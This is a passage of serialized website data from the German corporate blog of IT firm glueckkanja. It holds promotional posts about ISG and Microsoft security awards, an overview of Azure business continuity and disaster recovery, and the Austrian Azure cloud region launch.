Deutschland, Microsoft 365 Services Deutschland, IT Dienstleister Deutschland, Cloud Services Deutschland, ISG Provider Lens Deutschland, glueckkanja Deutschland, Microsoft Cloud Deutschland, ISG Leader 2025, IT Sicherheit Deutschland, Digitalisierung Unternehmen Deutschland, Azure Services Deutschland, Microsoft 365 Beratung Deutschland, glueckkanja, glueckkanja Microsoft Services, ISG Auszeichnung Microsoft",[19397,19399],{"lang":953,"href":19398},"/blog/corporate/2025/05/isg-germany-2025-en",{"lang":956,"href":19400},"/blog/corporate/2025/05/isg-germany-2025-es",{"noMargin":508},{"quote":508,"infos":19403},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19404,"form":19409},{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19405,"detailsHeader":895,"details":19406},"Die wiederholte Auszeichnung durch ISG bestätigt unseren Kurs: standardisierte, skalierbare Services für Microsoft-Plattformen – mit echtem Mehrwert für unsere Kunden.",[19407,19408],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19410,"method":870,"action":908,"fields":19411},{"skin":907},[19412,19413,19414,19415,19416,19417,19418,19419,19421,19423,19424],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19420},"DE",{"type":911,"id":942,"value":19422},"Form: Blog ISG Germany | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"image":19426,"cloudinary":508,"alt":19427,"bgColor":19428,"offset":749,"list":19429,"left":749,"float":749,"firstColWidth":2135,"secondColWidth":2147,"copyClasses":19433,"headline":19434,"subline":19435,"spacing":19436},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[19430],{"ctaText":19431,"ctaHref":19432,"ctaType":3868},"Mehr Infos","/de/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>Übrigens, in der Schweiz sind wir Rising Star!\u003Cbr />Merci, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in der Schweiz.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":19291,"description":19297},"posts/2025-05-08-isg-germany-2025",[963,19441],"ISG","V50zhAOdZjmcoM89VEoeFypia5Tbocu4sQ__icPmW_M",{"id":19444,"title":19445,"author":19446,"body":19447,"cta":764,"description":19451,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19504,"moment":19390,"navigation":508,"path":19545,"seo":19546,"stem":19547,"tags":19548,"webcast":749,"__hash__":19549},"content_de/posts/2025-05-08-isg-switzerland-2025.md","Schweiz legt nach. glueckkanja wird ISG Rising Star",[801],{"type":803,"value":19448,"toc":19499},[19449,19452,19455,19457,19459,19462,19466,19468,19474,19479,19483,19485,19491,19496],[806,19450,19451],{},"Bern ist bekannt für seine beeindruckende Altstadt, den Zeitglockenturm, das Bundeshaus – und natürlich den Rosengarten. Jetzt kommt ein neues Highlight dazu: glueckkanja Schweiz wurde in der aktuellen ISG Provider Lens™-Studie als „Rising Star“ ausgezeichnet – für unsere Microsoft 365 Services und Managed Services for Azure.",[806,19453,19454],{},"Seit 2024 sind wir mit glueckkanja auch in Bern vor Ort. Als erfahrener Microsoft-Partner begleiten wir von dort aus Schweizer Unternehmen in die Cloud – strategisch, sicher und mit einem klaren Blick aufs Machbare. So stärken wir seit rund zwölf Monaten die IT-Sicherheit im Schweizer Wirtschaftsraum und bringen Innovation in verschiedenste Branchen. Umso mehr freut es uns, dass unsere Arbeit nun auch von der ISG Provider Lens™ gewürdigt wurde.",[810,19456,19304],{"id":19303},[806,19458,816],{},[806,19460,19461],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. So viel zur Theorie – jetzt zu unseren Ergebnissen!",[810,19463,19465],{"id":19464},"glueckkanja-ist-rising-star-microsoft-365-services","glueckkanja ist Rising Star Microsoft 365 Services",[806,19467,816],{},[806,19469,19470],{},[1449,19471],{"alt":19472,"src":19473},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[806,19475,19476],{},[4655,19477,19478],{},"\"glueckkanja unterstützt Schweizer Unternehmen bei der sicheren Cloud-Transformation, integriert Microsoft 365 und Windows 365 und optimiert IT-Prozesse durch Automatisierung und Skalierbarkeit.\"",[810,19480,19482],{"id":19481},"glueckkanja-ist-rising-star-managed-services-for-azure","glueckkanja ist Rising Star Managed Services for Azure",[806,19484,816],{},[806,19486,19487],{},[1449,19488],{"alt":19489,"src":19490},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[806,19492,19493],{},[4655,19494,19495],{},"\"glueckkanja ist ein Rising Star im Schweizer Markt für Managed Services für Azure. Mit technologischem Weitblick, lokaler Präsenz und bewiesener Leistungsfähigkeit stärkt das Unternehmen Security, Automatisierung und Skalierbarkeit für zukunftssichere Cloud-Strategien.\"",[806,19497,19498],{},"Dafür sagen wir „Merci vielmals\" und stoßen jetzt mit einem Bärner Müntschi darauf an. Solltest du Lust haben, tiefer in die Studienergebnisse einzusteigen, findest du hier eine komplette ISG-Übersicht unserer Skills und Stärken.",{"title":863,"searchDepth":864,"depth":864,"links":19500},[19501,19502,19503],{"id":19303,"depth":864,"text":19304},{"id":19464,"depth":864,"text":19465},{"id":19481,"depth":864,"text":19482},{"seoTitle":19505,"titleClass":873,"date":19390,"categories":19506,"blogtitlepic":19507,"socialimg":19508,"customExcerpt":19509,"keywords":19240,"hreflang":19510,"footer":19515,"contactInContent":19516,"textImageTeaser":19538},"glueckkanja Schweiz als ISG „Rising Star“ 2025 für Microsoft 365 & Azure Services",[876],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Schweiz wurde von ISG als „Rising Star“ in den Kategorien Microsoft 365 Services und Managed Services for Azure ausgezeichnet. Eine Anerkennung, die zeigt: Unsere Standards, unser Anspruch und unsere Services setzen Maßstäbe – auch über Grenzen hinweg.",[19511,19513],{"lang":953,"href":19512},"/blog/corporate/2025/05/isg-switzerland-2025-en",{"lang":956,"href":19514},"/blog/corporate/2025/05/isg-switzerland-2025-es",{"noMargin":508},{"quote":508,"infos":19517},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19518,"form":19524},{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19254,"detailsHeader":895,"details":19519},[19520,19523],{"text":19521,"href":19522,"details":899,"icon":900},"+41 31 5611900","tel:+41 31 5611900",{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19525,"method":870,"action":908,"fields":19526},{"skin":907},[19527,19528,19529,19530,19531,19532,19533,19534,19535,19536,19537],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19276},{"type":911,"id":942,"value":19278},{"type":911,"id":945,"value":946},{"type":911,"id":948},{"image":19539,"cloudinary":508,"alt":19427,"bgColor":19428,"offset":749,"list":19540,"left":749,"float":749,"firstColWidth":2135,"secondColWidth":2147,"copyClasses":19433,"headline":19543,"subline":19544,"spacing":19436},"/logos/isg-provider-lens-leader-de.png",[19541],{"ctaText":19431,"ctaHref":19542,"ctaType":3868},"/blog/corporate/2025/05/isg-germany-2025","\u003Cp>Übrigens, in Deutschland sind wir Leader in den Bereichen Microsoft 365 und Managed Azure!\u003Cbr />Danke, ISG!\u003C/p>","\u003Cp>Erfahre jetzt alles über unsere ISG-Ergebnisse in Deutschland.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":19445,"description":19451},"posts/2025-05-08-isg-switzerland-2025",[963,19441],"vDqsKE_-Jf8wxHB7gIDdtf0em43ZKY5NrcT26aKwHoE",{"id":19551,"title":19552,"author":19553,"body":19554,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19610,"moment":19611,"navigation":508,"path":19623,"seo":19624,"stem":19625,"tags":19626,"webcast":749,"__hash__":19629},"content_de/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja weiterhin unter den Top 5 MSSPs weltweit",[801],{"type":803,"value":19555,"toc":19606},[19556,19560,19562,19565,19568,19571,19574,19585,19588,19591,19594,19598,19600,19603],[810,19557,19559],{"id":19558},"dreimal-in-folge-glueckkanja-zählt-zur-security-elite","Dreimal in Folge: glueckkanja zählt zur Security-Elite",[806,19561,816],{},[806,19563,19564],{},"Zum dritten Mal in Folge gehören wir zu den fünf besten Managed Microsoft Security Providern weltweit. Ein Triple, über das wir uns riesig freuen. CEO Christian Kanja und Security Lead Jan Geisbauer waren persönlich in San Francisco vor Ort, um diese Auszeichnung gemeinsam mit der Microsoft Intelligent Security Association (MISA) und der internationalen Security-Community zu feiern. RSA, Golden Gate Bridge, roter Teppich – alles dabei.",[806,19566,19567],{},"Und weil Innovation nicht nur auf der Bühne stattfindet, haben Christian und Jan auch Zukunftsluft geschnuppert: im selbstfahrenden Taxi durch die Straßen von San Francisco. Ohne Fahrer, aber mit jeder Menge Begeisterung – ein Erlebnis, das perfekt zum Spirit der RSA passte. Genau das ist auch unser Anspruch in der Cybersecurity: Vertrauen entsteht, wenn Systeme halten, was sie versprechen.",[806,19569,19570],{},"Die Microsoft Security Excellence Awards gehören zu den wichtigsten Auszeichnungen der Branche. Sie würdigen Partner, die mit Innovation und Servicequalität Standards setzen. Dass wir 2025 erneut als einer der besten Managed Security Service Provider ausgezeichnet wurden, ist eine besondere Bestätigung unserer Arbeit – und ein Meilenstein für unser gesamtes Team.",[806,19572,19573],{},"Was uns dahin gebracht hat:",[2738,19575,19576,19579,19582],{},[2741,19577,19578],{},"87 % unserer Kunden bewerten unsere technische Expertise auf höchstem Niveau",[2741,19580,19581],{},"94 % loben unsere 24/7-Services",[2741,19583,19584],{},"100 % sind mit der Gesamterfahrung zufrieden",[806,19586,19587],{},"Starke Ergebnisse, die zeigen: Als Team leisten wir Außergewöhnliches.",[806,19589,19590],{},"Ein großes Dankeschön an alle, die diesen Erfolg möglich gemacht haben – an Microsoft und die Microsoft Intelligent Security Association (MISA) für die enge Partnerschaft und das Vertrauen, an unsere Kunden für ihre Treue und an unser CSOC-Team, das Tag für Tag Spitzenleistung bringt.",[806,19592,19593],{},"In einer starken Security-Community arbeiten die besten Köpfe zusammen – und genau diese Zusammenarbeit treibt uns weiter an.",[810,19595,19597],{"id":19596},"der-blick-nach-vorn","Der Blick nach vorn",[806,19599,816],{},[806,19601,19602],{},"Dieser Award ist für uns Ansporn und Verpflichtung zugleich. Wir bleiben dran: mit Innovation, Leidenschaft und dem Anspruch, Microsoft-Sicherheitslösungen auf höchstem Niveau bereitzustellen. Gemeinsam mit Microsoft, unseren Kunden und Partnern schreiben wir das nächste Kapitel unserer Erfolgsgeschichte.",[806,19604,19605],{},"glueckkanja – Security auf Champions-League-Niveau.",{"title":863,"searchDepth":864,"depth":864,"links":19607},[19608,19609],{"id":19558,"depth":864,"text":19559},{"id":19596,"depth":864,"text":19597},{"seoTitle":19552,"titleClass":873,"date":19611,"categories":19612,"blogtitlepic":19613,"socialimg":19614,"customExcerpt":19615,"keywords":19616,"hreflang":19617,"scripts":19622},"2025-04-29",[876],"head-mssp-finalist-2025","/socialimg/og-img-mssp-2025.png","Die Microsoft Security Excellence Awards gehören zu den bedeutendsten Auszeichnungen der Branche. Auf der RSA Conference 2025 in San Francisco wurden erneut Partner geehrt, die mit Innovation, Servicequalität und Engagement Maßstäbe setzen. Dass glueckkanja 2025 wieder als Finalist bei den „Security MSSP of the Year Awards“ ausgezeichnet wurde, freut uns riesig – und ist ein starkes Zeichen für die Arbeit, die unser gesamtes Team jeden Tag leistet.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Bester Microsoft Security Partner 2025, Microsoft MSSP Finalist 2025, Microsoft Security Award Gewinner, Cybersecurity Anbieter mit Microsoft-Technologie, Managed Security für Microsoft 365, Microsoft Intelligent Security Association (MISA) Partner, RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, MISA Partner Microsoft, Microsoft Sicherheitslösungen für Unternehmen, Cybersecurity Trends 2025",[19618,19620],{"lang":953,"href":19619},"/blog/corporate/2025/03/mssp-2025-en",{"lang":956,"href":19621},"/blog/corporate/2025/03/mssp-2025-es",{"slick":508},"/posts/2025-04-29-rsa-mssp-2025",{"title":19552,"description":863},"posts/2025-04-29-rsa-mssp-2025",[963,19627,371,19628],"Microsoft","Misa","qJoeeOUV2zx9qs4ZL46QmQHMQ8v-0Adogq_DYF5tN38",{"id":19631,"title":19632,"author":19633,"body":19634,"cta":764,"description":19638,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19813,"moment":19815,"navigation":508,"path":19851,"seo":19852,"stem":19853,"tags":19854,"webcast":749,"__hash__":19857},"content_de/posts/2025-04-07-bcdr-management.md","Wenn Systeme ausfallen, zeigt sich, wie gut dein Plan wirklich ist",[1226],{"type":803,"value":19635,"toc":19804},[19636,19639,19645,19649,19651,19654,19657,19661,19663,19674,19677,19682,19686,19688,19691,19695,19697,19702,19710,19715,19723,19728,19736,19741,19749,19754,19762,19766,19768,19771,19776,19787,19791,19793,19796,19799],[806,19637,19638],{},"Moderne IT-Infrastrukturen sind verteilt, dynamisch und eng mit dem Geschäftserfolg verknüpft. Ausfälle einzelner Dienste oder ganzer Plattformen können schnell zu einem kritischen Risiko für Unternehmen werden – operativ wie reputativ.",[806,19640,19641,19644],{},[1736,19642,19643],{},"Business Continuity und Disaster Recovery (BCDR)"," sind heute kein optionales IT-Thema mehr, sondern eine unternehmerische Pflicht – sowohl aus regulatorischer Sicht als auch mit Blick auf Cyberresilienz und operative Stabilität.",[810,19646,19648],{"id":19647},"komplexität-wächst-resilienz-oft-nicht","Komplexität wächst – Resilienz oft nicht",[806,19650,816],{},[806,19652,19653],{},"Cloud-native Architekturen, hybride Szenarien, Self-Service-Initiativen aus Fachbereichen: Die IT-Landschaft wird zunehmend heterogener. In vielen Fällen fehlt jedoch eine übergreifende Struktur für Ausfallsicherheit.",[806,19655,19656],{},"Einzelne Applikationen entstehen schnell – häufig ohne konsistente Backup-, Recovery- oder Failover-Konzepte. Und genau hier entsteht eine gefährliche Lücke: Zwischen dem, was technisch möglich wäre, und dem, was tatsächlich umgesetzt wurde.",[810,19658,19660],{"id":19659},"regulatorische-anforderungen-nis2-und-dora-setzen-neue-maßstäbe","Regulatorische Anforderungen: NIS2 und DORA setzen neue Maßstäbe",[806,19662,816],{},[806,19664,19665,19666,19669,19670,19673],{},"Mit der ",[1736,19667,19668],{},"NIS2-Richtlinie (EU)"," und der ",[1736,19671,19672],{},"DORA-Verordnung"," (für den Finanzsektor) verschärfen sich die Anforderungen an betriebliche Resilienz und Wiederanlaufstrategien. Entscheidend ist nicht nur, ob du einen BCDR-Plan hast – sondern wie belastbar und testbar er ist.",[806,19675,19676],{},"In beiden Fällen gilt:",[3587,19678,19679],{},[806,19680,19681],{},"Verantwortung liegt beim Management – inklusive persönlicher Haftung bei Versäumnissen.",[810,19683,19685],{"id":19684},"azure-als-technologische-grundlage-für-bcdr-strategien","Azure als technologische Grundlage für BCDR-Strategien",[806,19687,816],{},[806,19689,19690],{},"Microsoft Azure bietet ein umfassendes Set an Tools, um moderne BCDR-Architekturen umzusetzen. Entscheidend ist die Fähigkeit, diese gezielt und abgestuft einzusetzen – je nach Kritikalität und Risikoprofil der jeweiligen Workloads.",[1671,19692,19694],{"id":19693},"schlüsselkomponenten","Schlüsselkomponenten:",[806,19696,1536],{},[806,19698,19699],{},[1736,19700,19701],{},"Availability Zones & Region Pairs",[2738,19703,19704,19707],{},[2741,19705,19706],{},"Physisch getrennte Rechenzentren innerhalb einer Region",[2741,19708,19709],{},"Hohe Verfügbarkeiten durch redundante Infrastruktur",[806,19711,19712],{},[1736,19713,19714],{},"Azure Backup & Cross Region Restore",[2738,19716,19717,19720],{},[2741,19718,19719],{},"Sicherung von VMs, Datenbanken und Workloads mit Geo-Redundanz",[2741,19721,19722],{},"Wiederherstellung auch außerhalb der Primärregion möglich",[806,19724,19725],{},[1736,19726,19727],{},"Azure Site Recovery",[2738,19729,19730,19733],{},[2741,19731,19732],{},"Replikation und orchestriertes Failover von VMs zwischen Regionen",[2741,19734,19735],{},"Failover-Tests in isolierten Umgebungen",[806,19737,19738],{},[1736,19739,19740],{},"Infrastructure as Code (IaC)",[2738,19742,19743,19746],{},[2741,19744,19745],{},"Automatisierte Wiederherstellung ganzer Infrastrukturen",[2741,19747,19748],{},"Konsistente Deployments, Versionierbarkeit, Recovery-Templates",[806,19750,19751],{},[1736,19752,19753],{},"Microsoft Defender for Cloud",[2738,19755,19756,19759],{},[2741,19757,19758],{},"Kontinuierliches Monitoring und Schwachstellen-Management",[2741,19760,19761],{},"Frühzeitige Erkennung und automatisierte Reaktionen auf Angriffe",[810,19763,19765],{"id":19764},"kein-bcdr-ohne-testbarkeit","Kein BCDR ohne Testbarkeit",[806,19767,816],{},[806,19769,19770],{},"Ein Disaster-Recovery-Plan ist nur so gut wie der letzte erfolgreiche Test. In der Praxis zeigt sich oft: Pläne existieren – sind aber weder aktuell noch realitätsnah erprobt.",[806,19772,19773],{},[1736,19774,19775],{},"Empfehlung:",[2738,19777,19778,19781,19784],{},[2741,19779,19780],{},"BCDR-Pläne als Teil der IT-Governance etablieren",[2741,19782,19783],{},"Zuständigkeiten klar definieren (auch außerhalb der IT)",[2741,19785,19786],{},"Wiederherstellungsszenarien regelmäßig testen – auch mit Fachbereichen",[810,19788,19790],{"id":19789},"fazit-ein-belastbarer-plan-ist-kein-nice-to-have-sondern-pflicht","Fazit: Ein belastbarer Plan ist kein Nice-to-have – sondern Pflicht",[806,19792,816],{},[806,19794,19795],{},"BCDR ist kein Produkt, sondern ein Prozess. Es geht nicht um die eine perfekte Lösung, sondern um eine risikobasierte Strategie, abgestimmt auf deine Applikationslandschaft, regulatorische Anforderungen und unternehmerischen Zielsetzungen.",[806,19797,19798],{},"Azure liefert die technologischen Grundlagen – aber die Entscheidung, sie richtig einzusetzen, beginnt auf C-Level.",[806,19800,19801],{},[1736,19802,19803],{},"Denn die Frage ist nicht, ob ein Ausfall kommt. Sondern ob du vorbereitet bist, wenn er eintritt.",{"title":863,"searchDepth":864,"depth":864,"links":19805},[19806,19807,19808,19811,19812],{"id":19647,"depth":864,"text":19648},{"id":19659,"depth":864,"text":19660},{"id":19684,"depth":864,"text":19685,"children":19809},[19810],{"id":19693,"depth":1814,"text":19694},{"id":19764,"depth":864,"text":19765},{"id":19789,"depth":864,"text":19790},{"seoTitle":19814,"titleClass":873,"date":19815,"categories":19816,"blogtitlepic":19817,"socialimg":19818,"customExcerpt":19819,"keywords":19820,"footer":19821,"contactInContent":19822,"scripts":19850},"Business Continuity & Disaster Recovery mit Azure: So machst du dein Unternehmen krisenfest","2025-04-07",[199],"head-bcdr-management.png","/blog/heads/head-bcdr-management.png","Moderne IT ist vernetzt, verteilt, komplex – und oft anfälliger, als man denkt. Business Continuity und Disaster Recovery sind kein IT-Luxus mehr, sondern Grundvoraussetzung für Resilienz. Die Frage ist nicht, ob etwas passiert. Sondern wie gut du vorbereitet bist, wenn es passiert.","Business Continuity, Disaster Recovery, BCDR, Microsoft Azure, Azure Backup, Azure Site Recovery, Hochverfügbarkeit Cloud, Ausfallsicherheit IT, Infrastruktur als Code, NIS2, DORA, Compliance, IT-Krisenmanagement, Cloud-Strategie, Azure BCDR, Notfallplanung IT, IT-Sicherheit, Cloud Resilienz, Ausfall Absicherung, Recovery Plan",{"noMargin":508},{"quote":508,"infos":19823},{"bgColor":883,"headline":19824,"subline":19825,"level":810,"textStyling":887,"flush":888,"person":19826,"form":19833},"Jetzt Kontakt aufnehmen!","Möchtest du mehr darüber erfahren, wie wir dein Unternehmen reibungslos und sicher in die neue Microsoft Cloud Region Österreich bringen? Wir stellen dir unser Angebot gerne persönlich vor, klären deine Fragen zu Datenschutz und Migration und begleiten dich Schritt für Schritt bei deinem Weg in die Cloud. Sichere dir jetzt dein persönliches Beratungsgespräch!",{"image":19827,"cloudinary":508,"alt":1226,"name":1226,"quotee":1226,"quoteeTitle":19828,"quote":19829,"detailsHeader":895,"details":19830},"/people/people-florian-stoeckl.jpg","Azure Lead","Die neue Microsoft Cloud Region Österreich ist ein echter Gamechanger: Lokale Datenspeicherung kombiniert mit globaler Cloud-Power – eine unschlagbare Mischung für Sicherheit, Performance und Innovation. Mit unserer langjährigen Expertise sorgen wir dafür, dass österreichische Unternehmen diese Chance jetzt optimal nutzen können.",[19831,19832],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19834,"method":870,"action":908,"fields":19835},{"skin":907},[19836,19837,19838,19839,19840,19842,19843,19844,19846,19848,19849],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":19841,"type":928,"id":929,"required":508,"requiredMsg":930},"Deine Nachricht an uns*",{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":199},{"type":911,"id":939,"value":19845},"AT",{"type":911,"id":942,"value":19847},"Form: Blog Hello Clöud | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508},"/posts/2025-04-07-bcdr-management",{"title":19632,"description":19638},"posts/2025-04-07-bcdr-management",[199,19855,19856],"BCDR","IT Infrastructure","HY4C9I9dQEyQyHF7lx31ooEwxEEpLZtDDH5gxVl7tiM",{"id":19859,"title":19860,"author":19861,"body":19862,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19938,"moment":19940,"navigation":508,"path":19972,"seo":19973,"stem":19974,"tags":19975,"webcast":749,"__hash__":19977},"content_de/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[1226],{"type":803,"value":19863,"toc":19934},[19864,19868,19870,19873,19899,19902,19906,19908,19911,19931],[810,19865,19867],{"id":19866},"eine-cloud-region-die-alles-verändert","Eine Cloud-Region, die alles verändert!",[806,19869,816],{},[806,19871,19872],{},"Jetzt gibt es eine Antwort auf all diese Challenges: Microsoft errichtet eine eigene Cloud-Region in Österreich mit hochmodernen Rechenzentren und maximaler Performance. Das bedeutet für dich: Du bekommst jetzt die globale Power einer Public Cloud mit der Sicherheit lokaler Datenspeicherung!",[2738,19874,19875,19881,19887,19893],{},[2741,19876,19877,19880],{},[1736,19878,19879],{},"Maximale Performance:"," geringere Latenzzeiten, höhere Skalierbarkeit, mehr Effizienz",[2741,19882,19883,19886],{},[1736,19884,19885],{},"Lokale Datenspeicherung:"," alle Daten bleiben in Österreich – sicher, konform und geschützt",[2741,19888,19889,19892],{},[1736,19890,19891],{},"Erhöhte Sicherheit & Resilienz:"," modernste Infrastruktur mit mehrfacher Absicherung",[2741,19894,19895,19898],{},[1736,19896,19897],{},"Nachhaltige IT:"," bis zu 93 % energieeffizienter als traditionelle Rechenzentren",[806,19900,19901],{},"Doch eine Cloud-Region allein reicht nicht – erst der richtige Partner macht den Unterschied. Hier kommen wir von glueckkanja ins Spiel.",[810,19903,19905],{"id":19904},"wir-machen-dich-bereit-für-die-lokale-zukunft-deiner-it","Wir machen dich bereit für die lokale Zukunft deiner IT!",[806,19907,816],{},[806,19909,19910],{},"In Deutschland gehören wir zu den führenden Microsoft-Partnern für Cloud-Migration. Jetzt gibt es unser Know-how auch in der neuen Microsoft Cloud Region Österreich. Als strategischer Partner bringen wir dein Unternehmen jetzt reibungslos in die Cloud. Du hast Fragen zum Datenschutz, zur Migration von Systemen oder zu nutzbaren finanziellen Vorteilen? Wir sind für dich da und begleiten dich von den ersten Steps bis zum finalen Go-live (und gerne auch darüber hinaus). Deine Vorteile:",[2738,19912,19913,19919,19925],{},[2741,19914,19915,19918],{},[1736,19916,19917],{},"Blueprint & Landing Zone Deployment:"," Wir ermöglichen dir eine sichere, schnelle und reibungslose Migration!",[2741,19920,19921,19924],{},[1736,19922,19923],{},"AMM Funding:"," Wir informieren dich umfassend über Microsoft-Förderungen für eine kosteneffiziente Umstellung!",[2741,19926,19927,19930],{},[1736,19928,19929],{},"Nahtloser Umzug:"," Wir begleiten dich mit standardisierten Lösungen Schritt für Schritt in die neue Ö-Cloud!",[806,19932,19933],{},"Profitiere jetzt von unserer Erfahrung aus über 100 erfolgreichen Cloud-Migrationen und unserer erstklassigen Microsoft-Expertise.",{"title":863,"searchDepth":864,"depth":864,"links":19935},[19936,19937],{"id":19866,"depth":864,"text":19867},{"id":19904,"depth":864,"text":19905},{"seoTitle":19939,"titleClass":873,"date":19940,"categories":19941,"blogtitlepic":19942,"socialimg":19943,"customExcerpt":19944,"keywords":19945,"contactInContent":19946,"hreflang":19966,"scripts":19971,"published":508},"Microsoft Cloud Region Österreich: Lokale Cloud-Power für dein Unternehmen","2025-03-12",[199],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Aktuell stehen Österreichs Unternehmen an einem Wendepunkt. Die Digitalisierung nimmt immer rasanter Fahrt auf. Gleichzeitig steigen mit ihr die Anforderungen an IT-Sicherheit, Geschwindigkeit und Flexibilität – und auch die Herausforderungen in Bezug auf Kosten, regulatorische Hürden und den Einsatz neuer Technologien wachsen.","Microsoft Cloud Region Österreich, Cloud Migration Österreich, lokale Datenspeicherung, Cloud Sicherheit, Microsoft Partner Österreich, Cloud-Performance, nachhaltige IT, Cloud Lösungen Österreich, Azure Migration, Landing Zone Deployment",{"quote":508,"infos":19947},{"bgColor":883,"headline":19824,"subline":19825,"level":810,"textStyling":887,"flush":888,"person":19948,"form":19952},{"image":19827,"cloudinary":508,"alt":1226,"name":1226,"quotee":1226,"quoteeTitle":19828,"quote":19829,"detailsHeader":895,"details":19949},[19950,19951],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},{"ctaText":905,"cta":19953,"method":870,"action":908,"fields":19954},{"skin":907},[19955,19956,19957,19958,19959,19960,19961,19962,19963,19964,19965],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},{"label":19841,"type":928,"id":929,"required":508,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":199},{"type":911,"id":939,"value":19845},{"type":911,"id":942,"value":19847},{"type":911,"id":945,"value":946},{"type":911,"id":948},[19967,19969],{"lang":953,"href":19968},"/blog/azure/2025/03/azure-goes-austria-en",{"lang":956,"href":19970},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":508},"/posts/2025-03-12-azure-goes-austria",{"title":19860,"description":863},"posts/2025-03-12-azure-goes-austria",[199,19976,19856,19286],"Cloud Migration","-eFhiSh4gYFDE-GRbtqAtk_Y-UGFMO_52qBwxlU0rV8",{"id":19979,"title":19980,"author":19981,"body":19982,"cta":764,"description":20048,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":20049,"moment":20051,"navigation":508,"path":20063,"seo":20064,"stem":20065,"tags":20066,"webcast":749,"__hash__":20067},"content_de/posts/2025-03-04-mssp-2025.md","'23, '24, '25 – das Triple ist komplett!",[801],{"type":803,"value":19983,"toc":20043},[19984,19990,19994,19996,20003,20005,20009,20011,20014,20017,20028,20031,20035,20037,20040],[806,19985,19986,19989],{},[1736,19987,19988],{},"Nach 2023 und 2024 setzt sich unser Erfolgskurs fort: glueckkanja gehört auch 2025 zu den Spitzenreitern der Microsoft Security Excellence Awards."," Als führender Managed Security Service Provider (MSSP) zählen wir erneut zu den Top-Partnern, die Microsoft für herausragende Leistungen im Bereich Cybersecurity auszeichnet. Drei aufeinanderfolgende Jahre in dieser Liga – das spricht für sich.",[810,19991,19993],{"id":19992},"eine-der-begehrtesten-auszeichnungen-der-branche","Eine der begehrtesten Auszeichnungen der Branche",[806,19995,816],{},[806,19997,19998,19999,20002],{},"Die Microsoft Security Excellence Awards gehören zu den renommiertesten Auszeichnungen der IT-Sicherheitsbranche. Jährlich ehrt Microsoft Partner, die neue Maßstäbe in der Abwehr von Cyber-Bedrohungen setzen. Auch 2025 gehört glueckkanja zu den ",[1736,20000,20001],{},"Spitzenreitern in der Kategorie \"Security MSSP of the Year\""," – einer Auszeichnung, die ausschließlich an die besten Managed Security Service Provider vergeben 